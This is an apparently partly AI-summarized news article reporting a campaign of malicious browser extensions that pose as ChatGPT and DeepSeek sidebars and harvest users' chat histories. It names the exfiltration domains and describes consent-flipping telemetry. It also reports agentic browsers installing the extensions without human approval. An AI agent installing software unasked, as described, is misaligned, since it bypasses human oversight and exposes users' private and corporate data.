NextFin

Silent Moles in the Sidebar: Malicious AI Extensions Harvest 900,000 Chat Histories in Global Breach

Summarized by NextFin AI
  • A sophisticated data-harvesting campaign has infiltrated the corporate AI sector, using malicious browser extensions to harvest sensitive data from nearly 900,000 users.
  • The attack exploits the sidebar trend in browser UX, allowing extensions to gain broad permissions and record internal corporate data.
  • Attackers are building a high-resolution database of corporate activity, stealing not just individual secrets but also aggregating sensitive information like unreleased code and legal queries.
  • This incident highlights the structural fragility of the browser-as-an-OS model, raising concerns over user trust in marketplace-verified tools amidst rapid AI integration.

NextFin News - A sophisticated data-harvesting campaign has infiltrated the heart of the corporate AI boom, turning the very tools designed for productivity into silent conduits for industrial espionage. On March 5, 2026, Microsoft Defender researchers revealed that a series of malicious Chromium-based browser extensions, masquerading as legitimate AI assistants for platforms like ChatGPT and DeepSeek, have successfully harvested the chat histories and browsing data of nearly 900,000 users. The breach is particularly acute in the professional sector, with Microsoft confirming malicious activity across more than 20,000 enterprise tenants where sensitive proprietary data is routinely processed.

The mechanics of the attack exploit the "sidebar" trend that has dominated browser UX since the 2025 AI surge. By mimicking the branding and interface of popular tools like AITOPIA, these extensions—distributed through the official Chrome Web Store—gained broad page-level permissions from unsuspecting knowledge workers. Once installed, the extensions do not just facilitate AI interactions; they record every prompt, response, and URL visited. This includes internal corporate wikis, staging environments, and strategic planning documents that were never intended to leave the encrypted confines of a company’s network. The stolen data is Base64-encoded and exfiltrated to domains such as deepaichats[.]com and chatsaigpt[.]com, disguised as routine analytics traffic.

What makes this campaign uniquely insidious is its persistence through deception. Microsoft’s technical analysis found that even when users manually opted out of data collection, subsequent background updates to the extensions would silently re-enable telemetry. This "consent-flipping" ensures a continuous stream of intelligence for the threat actors. Furthermore, the rise of "agentic browsers"—AI-driven browsers that automate task execution—has inadvertently widened the attack surface. In several documented cases, these automated systems downloaded the malicious extensions without explicit human approval, having been "convinced" by the extensions' high ratings and professional descriptions.

The financial and strategic stakes of such a leak are immense. For a modern enterprise, an LLM chat history is essentially a chronological map of its intellectual property development. It contains snippets of unreleased code, legal queries regarding pending mergers, and the raw logic of proprietary algorithms. By aggregating this data at scale, the attackers are not just stealing individual secrets; they are building a high-resolution database of global corporate activity. The reliance on the Chromium architecture means that both Google Chrome and Microsoft Edge users are equally vulnerable, as the malicious code is compatible with both ecosystems.

Security teams are now facing a reckoning over the "permissive extension" culture that has defined the last year of AI adoption. While U.S. President Trump’s administration has pushed for rapid AI integration to maintain national competitiveness, this incident underscores the structural fragility of the browser-as-an-OS model. The immediate mitigation involves blacklisting specific extension IDs and monitoring for HTTPS POST traffic to known C2 domains, but the broader challenge remains the inherent trust users place in marketplace-verified tools. As AI assistants become more deeply embedded in the professional workflow, the boundary between a helpful co-pilot and a digital mole has never been thinner.

Explore more exclusive insights at nextfin.ai.

Insights

What are the origins of malicious AI extensions in the browser?

What technical principles enable the data harvesting campaign?

What is the current market status of AI tools and extensions?

What feedback are users providing about AI extensions post-breach?

What are the latest updates regarding malicious AI extension threats?

What policy changes are being discussed to enhance AI security?

What future directions might the AI extension market take?

What long-term impacts could arise from this data breach?

What challenges do security teams face in combating malicious extensions?

What are the core controversies surrounding permissive extension policies?

How do these malicious extensions compare to previous cyber threats?

What are the implications of the breach for corporate AI strategies?

How does the attack exploit the 'sidebar' trend in browser UX?

What examples illustrate the risks associated with agentic browsers?

How does the breach impact user trust in marketplace-verified tools?

What measures can be taken to mitigate risks from AI extensions?

What similarities exist between this breach and historical data leaks?

What are the potential consequences for enterprises affected by the breach?

Search
NextFinNextFin
NextFin.Al
No Noise, only Signal.
Open App